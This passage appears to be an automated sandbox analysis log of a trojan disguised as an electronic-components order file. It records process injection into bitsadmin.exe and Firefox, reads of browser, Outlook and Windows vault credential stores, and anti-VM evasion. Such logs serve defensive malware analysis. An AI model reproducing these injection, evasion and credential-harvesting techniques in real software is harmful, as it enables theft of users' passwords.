Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1835652005.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe
Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1854483191.0000000007A90000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe
Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1839053698.0000000004419000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe
Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1839053698.0000000004419000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe
Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000000.1672252402.0000000000816000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameJAEN.exe" vs 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe
Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1856566677.0000000009C40000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe
Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000002.00000002.2276864429.00000000017FD000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe
Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Binary or memory string: OriginalFilenameJAEN.exe" vs 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe

Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/2@11/8

Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe

Mutant created: NULL

Source: C:\Windows\SysWOW64\bitsadmin.exe

File created: C:\Users\user\AppData\Local\Temp\6p1225E

Jump to behavior

Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: bitsadmin.exe, 00000007.00000002.3524147073.00000000008B5000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000002.3524147073.00000000008D6000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000003.2456330600.00000000008D6000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000003.2459260552.00000000008D6000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	ReversingLabs: Detection: 42%
Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Virustotal: Detection: 45%

Source: unknown	Process created: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe "C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe"
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process created: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe "C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe"
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	Process created: C:\Windows\SysWOW64\bitsadmin.exe "C:\Windows\SysWOW64\bitsadmin.exe"
Source: C:\Windows\SysWOW64\bitsadmin.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process created: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe "C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe"	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	Process created: C:\Windows\SysWOW64\bitsadmin.exe "C:\Windows\SysWOW64\bitsadmin.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\bitsadmin.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: bitsadmin.pdb source: cvSKtqilyhlQ.exe, 00000006.00000002.3524646475.0000000000968000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: bitsadmin.pdbGCTL source: cvSKtqilyhlQ.exe, 00000006.00000002.3524646475.0000000000968000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: cvSKtqilyhlQ.exe, 00000006.00000000.2197594264.000000000027E000.00000002.00000001.01000000.0000000C.sdmp, cvSKtqilyhlQ.exe, 00000008.00000002.3523961232.000000000027E000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: wntdll.pdbUGP source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000002.3525550334.000000000317E000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000003.2278357152.0000000000BD7000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000002.3525550334.0000000002FE0000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000003.2276438628.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, bitsadmin.exe, 00000007.00000002.3525550334.000000000317E000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000003.2278357152.0000000000BD7000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000002.3525550334.0000000002FE0000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000003.2276438628.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_0B24036B push ecx; ret	0_2_0B24036C
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0041480C push 8080F99Fh; retf	2_2_00414814
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0040182E push edx; ret	2_2_00401831
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_00414893 pushad ; iretd	2_2_004148B1
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_00417253 push ds; ret	2_2_00417260
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_00417298 push FFFFFF8Fh; retf	2_2_0041729A
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_004143DD push edi; iretd	2_2_004143EC
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_004143E3 push edi; iretd	2_2_004143EC
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_004033B0 push eax; ret	2_2_004033B2
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_00408480 pushad ; iretd	2_2_00408490
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_00408667 push E15317CDh; retf	2_2_0040866C
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_00418E05 push ss; retf	2_2_00418E20
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_016D225F pushad ; ret	2_2_016D27F9
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_016D27FA pushad ; ret	2_2_016D27F9
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017009AD push ecx; mov dword ptr [esp], ecx	2_2_017009B6
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_016D283D push eax; iretd	2_2_016D2858
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	Code function: 6_2_0301027B pushad ; iretd	6_2_03010299
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	Code function: 6_2_0301AAE5 push 62D0A9FFh; retf	6_2_0301AAFD
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	Code function: 6_2_030101F4 push 8080F99Fh; retf	6_2_030101FC
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	Code function: 6_2_0300404F push E15317CDh; retf	6_2_03004054
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	Code function: 6_2_0301F097 push es; iretd	6_2_0301F0A4
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	Code function: 6_2_030147ED push ss; retf	6_2_03014808
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	Code function: 6_2_03003E68 pushad ; iretd	6_2_03003E78
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	Code function: 6_2_0301AEB4 push eax; ret	6_2_0301AECF
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	Code function: 6_2_0301AED1 push eax; ret	6_2_0301AECF
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	Code function: 6_2_03012C3B push ds; ret	6_2_03012C48
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	Code function: 6_2_03012C80 push FFFFFF8Fh; retf	6_2_03012C82
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_02FE225F pushad ; ret	7_2_02FE27F9
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_02FE27FA pushad ; ret	7_2_02FE27F9
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030109AD push ecx; mov dword ptr [esp], ecx	7_2_030109B6
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_02FE283D push eax; iretd	7_2_02FE2858

Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe

Static PE information: section name: .text entropy: 7.605942903718738

Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe PID: 6900, type: MEMORYSTR

Switches to a custom stack to bypass stack traces

Source: C:\Windows\SysWOW64\bitsadmin.exe	API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\bitsadmin.exe	API/Special instruction interceptor: Address: 7FFE2220D7E4
Source: C:\Windows\SysWOW64\bitsadmin.exe	API/Special instruction interceptor: Address: 7FFE2220D944
Source: C:\Windows\SysWOW64\bitsadmin.exe	API/Special instruction interceptor: Address: 7FFE2220D504
Source: C:\Windows\SysWOW64\bitsadmin.exe	API/Special instruction interceptor: Address: 7FFE2220D544
Source: C:\Windows\SysWOW64\bitsadmin.exe	API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\bitsadmin.exe	API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Windows\SysWOW64\bitsadmin.exe	API/Special instruction interceptor: Address: 7FFE2220DA44

Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Memory allocated: 1330000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Memory allocated: 2C10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Memory allocated: 2960000 memory reserve \| memory write watch	Jump to behavior
